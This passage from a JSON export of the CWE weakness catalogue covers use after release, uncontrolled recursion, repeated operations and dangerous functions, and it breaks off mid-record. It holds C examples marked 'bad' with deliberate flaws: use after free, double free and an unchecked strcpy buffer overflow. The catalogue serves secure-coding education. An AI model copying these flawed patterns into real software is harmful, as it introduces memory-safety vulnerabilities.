that is associated with a different user or entity."},{"Scope":["Other","Availability"],"Impact":["Other","DoS: Crash, Exit, or Restart"],"Note":"When a resource is released it might not be in an expected state, later attempts to access the resource may lead to resultant errors that may lead to a crash."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-71"},"Intro_Text":"The following code shows a simple example of a use after free error:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char* ptr = (char*)malloc (SIZE);if (err) {}...if (abrt) {}","xhtml:br":["","",""],"xhtml:div":[{"#text":"abrt = 1;free(ptr);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"logError(\\"operation aborted before commit\\", ptr);","attr":{"@_style":"margin-left:10px;"}}]}},"Body_Text":"When an error occurs, the pointer is immediately freed. However, this pointer is later incorrectly used in the logError function."},{"attr":{"@_Demonstrative_Example_ID":"DX-72"},"Intro_Text":"The following code shows a simple example of a double free error:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char* ptr = (char*)malloc (SIZE);...if (abrt) {}...free(ptr);","xhtml:br":["","","",""],"xhtml:div":{"#text":"free(ptr);","attr":{"@_style":"margin-left:10px;"}}}},"Body_Text":["Double free vulnerabilities have two common (and sometimes overlapping) causes:",{"xhtml:ul":{"xhtml:li":[{"xhtml:div":"Error conditions and other exceptional circumstances"},{"xhtml:div":"Confusion over which part of the program is responsible for freeing the memory"}]}},"Although some double free vulnerabilities are not much more complicated than the previous example, most are spread out across hundreds of lines of code or even different files. Programmers seem particularly susceptible to freeing global variables more than once."]},{"Intro_Text":"In the following C/C++ example the method processMessage is used to process a message received in the input array of char arrays. The input message array contains two char arrays: the first is the length of the message and the second is the body of the message. The length of the message is retrieved and used to allocate enough memory for a local char array, messageBody, to be created for the message body. The messageBody is processed in the method processMessageBody that will return an error if an error occurs while processing. If an error occurs then the return result variable is set to indicate an error and the messageBody char array memory is released using the method free and an error message is sent to the logError method.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#define FAIL 0#define SUCCESS 1#define ERROR -1#define MAX_MESSAGE_SIZE 32int processMessage(char **message){}","xhtml:br":["","","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int result = SUCCESS;int length = getMessageLength(message[0]);char *messageBody;if ((length &gt; 0) &amp;&amp; (length &lt; MAX_MESSAGE_SIZE)) {}else {}if (result == ERROR) {}return result;","xhtml:br":["","","","","","","","","","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"messageBody = (char*)malloc(length*sizeof(char));messageBody = &amp;message[1][0];int success = processMessageBody(messageBody);if (success == ERROR) {}","xhtml:br":["","","","",""],"xhtml:div":{"#text":"result = ERROR;free(messageBody);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},{"#text":"printf(\\"Unable to process message; invalid message length\\");result = FAIL;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"logError(\\"Error processing message\\", messageBody);","attr":{"@_style":"margin-left:10px;"}}]}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"...messageBody = (char*)malloc(length*sizeof(char));messageBody = &amp;message[1][0];int success = processMessageBody(messageBody);if (success == ERROR) {}...","xhtml:br":["","","","","","",""],"xhtml:div":{"#text":"result = ERROR;logError(\\"Error processing message\\", messageBody);free(messageBody);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}}],"Body_Text":"However, the call to the method logError includes the messageBody after the memory for messageBody has been released using the free method. This can cause unexpected results and may lead to system crashes. A variable should never be used after its memory resources have been released."}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2009-3547","Description":"chain: race condition might allow resource to be released before operating on it, leading to NULL dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3547"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP15","Entry_Name":"Faulty Resource Use"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO46-C","Entry_Name":"Do not access a closed file","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM30-C","Entry_Name":"Do not access freed memory","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"OMG ASCSM"},"Entry_ID":"ASCSM-CWE-672"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-962","@_Section":"ASCSM-CWE-672"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Demonstrative_Examples, Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Use of a Resource after Expiration or Release","attr":{"@_Date":"2010-02-16"}}}},"673":{"attr":{"@_ID":"673","@_Name":"External Influence of Sphere Definition","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product does not prevent the definition of control spheres from external actors.","Extended_Description":"Typically, a product defines its control sphere within the code itself, or through configuration by the product\'s administrator. In some cases, an external party can change the definition of the control sphere. This is typically a resultant weakness.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Other"}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"Consider a blog publishing tool, which might have three explicit control spheres: the creation of articles, only accessible to a \\"publisher;\\" commenting on articles, only accessible to a \\"commenter\\" who is a registered user; and reading articles, only accessible to an anonymous reader. Suppose that the application is deployed on a web server that is shared with untrusted parties. If a local user can modify the data files that define who a publisher is, then this user has modified the control sphere. In this case, the issue would be resultant from another weakness such as insufficient permissions."},{"Intro_Text":"In Untrusted Search Path (CWE-426), a user might be able to define the PATH environment variable to cause the product to search in the wrong directory for a library to load. The product\'s intended sphere of control would include \\"resources that are only modifiable by the person who installed the product.\\" The PATH effectively changes the definition of this sphere so that it overlaps the attacker\'s sphere of control."}]},"Notes":{"Note":{"#text":"A \\"control sphere\\" is a set of resources and behaviors that are accessible to a single actor, or a group of actors. A product\'s security model will typically define multiple spheres, possibly implicitly. For example, a server might define one sphere for \\"administrators\\" who can create new user accounts with subdirectories under /home/server/, and a second sphere might cover the set of users who can create or delete files within their own subdirectories. A third sphere might be \\"users who are authenticated to the operating system on which the product is installed.\\" Each sphere has different sets of actors and allowable behaviors.","attr":{"@_Type":"Theoretical"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships, Relevant_Properties"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"674":{"attr":{"@_ID":"674","@_Name":"Uncontrolled Recursion","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product does not properly control the amount of recursion which takes place,  consuming excessive resources, such as allocated memory or the program stack.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"691","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"Stack Exhaustion"}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"The uncontrolled recursion is often due to an improper or missing conditional"}},"Common_Consequences":{"Consequence":[{"Scope":"Availability","Impact":["DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)"],"Note":"Resources including CPU, memory, and stack memory could be rapidly consumed or exhausted, eventually leading to an exit or crash."},{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"In some cases, an application\'s interpreter might kill a process or thread that appears to be consuming too much resources, such as with PHP\'s memory_limit setting. When the interpreter kills the process/thread, it might report an error containing detailed information such as the application\'s installation path."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Ensure an end condition will be reached under all logic conditions.  The end condition may include testing against the depth of recursion and exiting with an error if the recursion goes too deep. The complexity of the end condition contributes to the effectiveness of this action.","Effectiveness":"Moderate"},{"Phase":"Implementation","Description":"Increase the stack size.","Effectiveness":"Limited","Effectiveness_Notes":"Increasing the stack size might only be a temporary measure, since the stack typically is still not very large, and it might remain easy for attackers to cause an out-of-stack fault."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In this example a mistake exists in the code where the exit condition contained in flg is never called. This results in the function calling itself over and over again until the stack is exhausted.","Example_Code":[{"#text":"void do_something_recursive (int flg){}int flag = 1; // Set to TRUEdo_something_recursive (flag);","attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:br":["","","",""],"xhtml:div":{"#text":"... // Do some real work here, but the value of flg is unmodifiedif (flg) { do_something_recursive (flg); }    // flg is never modified so it is always TRUE - this call will continue until the stack explodes","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}},{"#text":"void do_something_recursive (int flg){}int flag = 1; // Set to TRUEdo_something_recursive (flag);","attr":{"@_Nature":"good","@_Language":"C"},"xhtml:br":["","","",""],"xhtml:div":[{"#text":"... // Do some real work here","attr":{"@_style":"margin-left:20px;"}},{"#text":"// Modify value of flg on done condition","attr":{"@_style":"margin-left:10px;"}},{"#text":"if (flg) { do_something_recursive (flg); }    // returns when flg changes to 0","attr":{"@_style":"margin-left:10px;"}}]}],"Body_Text":"Note that the only difference between the Good and Bad examples is that the recursion flag will change value and cause the recursive to return."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2007-1285","Description":"Deeply nested arrays trigger stack exhaustion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1285"},{"Reference":"CVE-2007-3409","Description":"Self-referencing pointers create infinite loop and resultant stack exhaustion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3409"},{"Reference":"CVE-2016-10707","Description":"Javascript application accidentally changes input in a way that prevents a recursive call from detecting an exit condition.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10707"},{"Reference":"CVE-2016-3627","Description":"An attempt to recover a corrupted XML file infinite recursion protection counter was not always incremented missing the exit condition.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3627"},{"Reference":"CVE-2019-15118","Description":"USB-audio driver\'s descriptor code parsing allows unlimited recursion leading to stack exhaustion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15118"}]},"Affected_Resources":{"Affected_Resource":"CPU"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A9","Entry_Name":"Denial of Service","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP13","Entry_Name":"Unrestricted Consumption"},{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-CWE-674"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"230"}},{"attr":{"@_CAPEC_ID":"231"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-CWE-674"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Demonstrative_Examples, Description, Modes_of_Introduction, Observed_Examples, Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Potential_Mitigations"}]}},"675":{"attr":{"@_ID":"675","@_Name":"Multiple Operations on Resource in Single-Operation Context","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product performs the same operation on a resource two or more times, when the operation should only be applied once.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"573","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"586","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"102","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Other"}},"Notes":{"Note":{"#text":"This weakness is probably closely associated with other issues related to doubling, such as CWE-462 (duplicate key in alist) or CWE-102 (Struts duplicate validation forms). It\'s usually a case of an API contract violation (CWE-227).","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Relevant_Properties, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"676":{"attr":{"@_ID":"676","@_Name":"Use of Potentially Dangerous Function","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The program invokes a potentially dangerous function that could introduce a vulnerability if it is used incorrectly, but the function can also be used safely.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1177","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary"},{"Ordinality":"Indirect"}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Other","Impact":["Varies by Context","Quality Degradation","Unexpected State"],"Note":"If the function is used incorrectly, then it could result in security problems."}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Bytecode Weakness Analysis - including disassembler + source code weakness analysis","Binary Weakness Analysis - including disassembler + source code weakness analysis"]}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Binary / Bytecode Quality Analysis","Binary / Bytecode simple extractor - strings, ELF readers, etc."]}}]}},"Effectiveness":"High"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities &amp; anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Debugger"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Monitored Virtual Environment - run potentially malicious code in sandbox / wrapper / virtual machine, see if it does anything suspicious"}}]}},"Effectiveness":"High"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Focused Manual Spotcheck - Focused manual analysis of source"}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Warning Flags","Source Code Quality Analyzer"]}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Origin Analysis"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Formal Methods / Correct-By-Construction","Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"]}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":{"Phase":["Build and Compilation","Implementation"],"Description":"Identify a list of prohibited API functions and prohibit developers from using these functions, providing safer alternatives. In some cases, automatic code analysis tools or the compiler can be instructed to spot use of prohibited functions, such as the \\"banned.h\\" include file from Microsoft\'s SDL. [REF-554] [REF-7]"}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-6"},"Intro_Text":"The following code attempts to create a local copy of a buffer to perform some manipulations to the data.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void manipulate_string(char * string){}","xhtml:div":{"#text":"char buf[24];strcpy(buf, string);...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}},"Body_Text":"However, the programmer does not ensure that the size of the data pointed to by string will fit in the local buffer and copies the data with the potentially dangerous strcpy() function. This may result in a buffer overflow condition if an attacker can influence the contents of the string parameter."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2007-1470","Description":"Library has multiple buffer overflows using sprintf() and strcpy()","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1470"},{"Reference":"CVE-2009-3849","Description":"Buffer overflow using strcat()","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3849"},{"Reference":"CVE-2006-2114","Description":"Buffer overflow using strcpy()","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2114"},{"Reference":"CVE-2006-0963","Description":"Buffer overflow using strcpy()","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0963"},{"Reference":"CVE-2011-0712","Description":"Vulnerable use of strcpy() changed to use safer strlcpy()","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0712"},{"Reference":"CVE-2008-5005","Description":"Buffer overflow using strcpy()","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5005"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Dangerous Functions"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"CON33-C","Entry_Name":"Avoid race conditions when using library functions","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ENV33-C","Entry_Name":"Do not call system()","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ERR07-C","Entry_Name":"Prefer functions that support error checking over equivalent functions that don\'t"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ERR34-C","Entry_Name":"Detect errors when converting a string to a number","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO01-C","Entry_Name":"Be careful using functions that use file names for identification"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MSC30-C","Entry_Name":"Do not use the rand() function for generating pseudorandom numbers","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"STR31-C","Entry_Name":"Guarantee that storage for strings has sufficient space for character data and the null terminator","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP3","Entry_Name":"Use of an improper API"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-554"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 5, &#34;Safe String Handling&#34; Page 156, 160"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 8, &#34;C String Handling&#34;, Page 388"}}]},"Notes":{"Note":{"#text":"This weakness is different than CWE-242 (Use of Inherently Dangerous Function). CWE-242 covers functions with such significant security problems that they can never be guaranteed to be safe. Some functions, if used properly, do not directly pose a security risk, but can introduce a weakness if not called correctly. These are regarded as potentially dangerous. A well-known example is the strcpy() function. When provided with a destination buffer that is larger than its source, strcpy() will not overflow. However, it is so often misused that some developers prohibit strcpy() entirely.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content 